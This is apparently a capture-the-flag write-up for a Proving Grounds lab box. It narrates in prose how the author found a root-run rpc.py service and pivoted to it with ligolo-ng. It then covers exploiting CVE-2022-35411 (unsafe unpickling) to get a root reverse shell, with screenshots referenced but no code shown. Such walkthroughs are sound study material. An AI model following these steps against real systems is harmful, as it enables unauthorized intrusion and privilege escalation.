Enumeration

Nmap

Initial Nmap scan revealed SSH, 8000 ports were open.

00 - nmap

WEB Enumeration

Port 8000 was TTYD Terminal application.

01 - pc

Exploitation (Directly Root)

We already had access to the user. So I ran linpeas and found a suspicious file ran by root (rpc.py).

02 - sus

Then I checked the rpc.py, it was runnşng a web application. Then checked netstat and found it was running locally on port 65432.

03 - rpc py and localhost running application

ligolo-ng

So I decided to run ligolo-ng to access internal application from outside.

I set the proxy and run the agent. Note that to access internal network (127.0.0.1) of the agent we need to add route to 240.0.0.1/32. For more information about this: https://docs.ligolo.ng/Localhost/

04 - agent localhost

05 - agnet

CVE-2022-35411

rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the “serializer: pickle” HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.

After some research I found that rpc.py is vulnerable to command execution. As our target was running this app as root, we could simply get root by this vector. So I checked and found an exploit.

06 - exploit

This exploit was running for 127.0.0.1 so I updated to script to 240.0.0.1 (127.0.0.1 of target).

At first I tested the exploit with simple http request and it worked.

07 -testing exploit

08 - it works

So I started netcat listener, then ran bash reverse shell and got the shell.

09 - exploit

10 - gg

<
Previous Post
Law - Proving Grounds Practice
>
Next Post
Hutch - Proving Grounds Practice